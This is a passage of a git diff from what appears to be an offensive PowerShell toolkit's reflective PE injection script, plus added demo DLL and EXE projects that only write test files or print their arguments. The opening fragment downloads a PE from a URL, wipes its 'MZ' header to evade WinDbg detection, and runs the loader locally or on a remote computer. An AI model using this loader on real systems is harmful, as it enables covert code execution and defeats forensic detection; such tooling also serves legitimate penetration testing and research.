$WebClient.DownloadData($PEUrl) + } + + #Verify the image is a valid PE file + $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' + + if ($e_magic -ne 'MZ') + { + throw 'PE is not a valid PE file.' + } + + # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg + # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. + $PEBytes[0] = 0 + $PEBytes[1] = 0 + + #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1) + if ($ExeArgs -ne $null -and $ExeArgs -ne '') + { + $ExeArgs = "ReflectiveExe $ExeArgs" + } + else + { + $ExeArgs = "ReflectiveExe" + } + + if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName) + } + else + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName) -ComputerName $ComputerName + } + } + + Main +}
\ No newline at end of file diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL.sln b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln index 55267b4..55267b4 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL.sln +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp index 61380d3..61380d3 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.cpp +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h index 2cb11a0..2cb11a0 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.h +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj index 788891f..788891f 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj.filters b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters index 40f585c..40f585c 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/DemoDLL.vcxproj.filters +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/ReadMe.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt index 0edff7b..0edff7b 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/ReadMe.txt +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/dllmain.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp index 69b5891..69b5891 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/dllmain.cpp +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/stdafx.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp index f18a679..f18a679 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/stdafx.cpp +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/stdafx.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h index a67fe85..a67fe85 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/stdafx.h +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h diff --git a/CodeExecution/DemoReflectiveDLL/DemoDLL/targetver.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h index 87c0086..87c0086 100644 --- a/CodeExecution/DemoReflectiveDLL/DemoDLL/targetver.h +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln new file mode 100644 index 0000000..d05acff --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln @@ -0,0 +1,26 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64 + {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp new file mode 100644 index 0000000..6ce31c6 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp @@ -0,0 +1,19 @@ +// DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application. +// + +#include "stdafx.h" + +using namespace std; + +extern "C" __declspec( dllexport ) void VoidFunc(); + + +extern "C" __declspec( dllexport ) void VoidFunc() +{ + ofstream myfile; + _mkdir("c:\\ReflectiveLoaderTest"); + myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt"); + myfile << "Dll Void function successfully called.\n"; + myfile.close(); + return; +}
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj new file mode 100644 index 0000000..d151ba5 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj @@ -0,0 +1,174 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>DemoDLL_RemoteProcess</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v110</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;DEMODLL_REMOTEPROCESS_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="DemoDLL_RemoteProcess.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters new file mode 100644 index 0000000..b454b33 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters @@ -0,0 +1,39 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <Text Include="ReadMe.txt" /> + </ItemGroup> + <ItemGroup> + <ClInclude Include="stdafx.h"> + <Filter>Header Files</Filter> + </ClInclude> + <ClInclude Include="targetver.h"> + <Filter>Header Files</Filter> + </ClInclude> + </ItemGroup> + <ItemGroup> + <ClCompile Include="stdafx.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="DemoDLL_RemoteProcess.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + <ClCompile Include="dllmain.cpp"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt new file mode 100644 index 0000000..3aa356f --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt @@ -0,0 +1,48 @@ +======================================================================== + DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview +======================================================================== + +AppWizard has created this DemoDLL_RemoteProcess DLL for you. + +This file contains a summary of what you will find in each of the files that +make up your DemoDLL_RemoteProcess application. + + +DemoDLL_RemoteProcess.vcxproj + This is the main project file for VC++ projects generated using an Application Wizard. + It contains information about the version of Visual C++ that generated the file, and + information about the platforms, configurations, and project features selected with the + Application Wizard. + +DemoDLL_RemoteProcess.vcxproj.filters + This is the filters file for VC++ projects generated using an Application Wizard. + It contains information about the association between the files in your project + and the filters. This association is used in the IDE to show grouping of files with + similar extensions under a specific node (for e.g. ".cpp" files are associated with the + "Source Files" filter). + +DemoDLL_RemoteProcess.cpp + This is the main DLL source file. + + When created, this DLL does not export any symbols. As a result, it + will not produce a .lib file when it is built. If you wish this project + to be a project dependency of some other project, you will either need to + add code to export some symbols from the DLL so that an export library + will be produced, or you can set the Ignore Input Library property to Yes + on the General propert page of the Linker folder in the project's Property + Pages dialog box. + +///////////////////////////////////////////////////////////////////////////// +Other standard files: + +StdAfx.h, StdAfx.cpp + These files are used to build a precompiled header (PCH) file + named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj. + +///////////////////////////////////////////////////////////////////////////// +Other notes: + +AppWizard uses "TODO:" comments to indicate parts of the source code you +should add to or customize. + +///////////////////////////////////////////////////////////////////////////// diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp new file mode 100644 index 0000000..7cab1a2 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp @@ -0,0 +1,28 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +using namespace std; + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + ofstream myfile; + + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + _mkdir("c:\\ReflectiveLoaderTest"); + myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt"); + myfile << "DllMain successfully called.\n"; + myfile.close(); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp new file mode 100644 index 0000000..356b70b --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp @@ -0,0 +1,8 @@ +// stdafx.cpp : source file that includes just the standard includes +// DemoDLL_RemoteProcess.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h new file mode 100644 index 0000000..1b77181 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h @@ -0,0 +1,19 @@ +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#include "targetver.h" + +#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers +// Windows Header Files: +#include <windows.h> +#include <iostream> +#include <fstream> +#include <string.h> +#include <direct.h> + + +// TODO: reference additional headers your program requires here diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h new file mode 100644 index 0000000..87c0086 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h @@ -0,0 +1,8 @@ +#pragma once + +// Including SDKDDKVer.h defines the highest available Windows platform. + +// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and +// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. + +#include <SDKDDKVer.h> diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln new file mode 100644 index 0000000..891727b --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln @@ -0,0 +1,36 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2012 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64 + {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64 + {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp new file mode 100644 index 0000000..364340b --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp @@ -0,0 +1,26 @@ +// DemoExe.cpp : Defines the entry point for the console application. +// + +#include "stdafx.h" +#include <iostream> + +using namespace std; + +int _tmain(int argc, _TCHAR* argv[]) +{ + printf("Exe loaded! Printing argc and argv\n\n"); + + printf("Argc: %d\n", argc); + printf("ArgvAddress: %d\n", argv); + + for (int i = 0; i < argc; i++) + { + wprintf(L"Argv: %s\n", argv[i]); + } + + printf("Exiting exe\n"); + + return 0; +} + + diff --git a/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj new file mode 100644 index 0000000..bdf3fe0 --- /dev/null +++ b/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj @@ -0,0 +1,162 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + 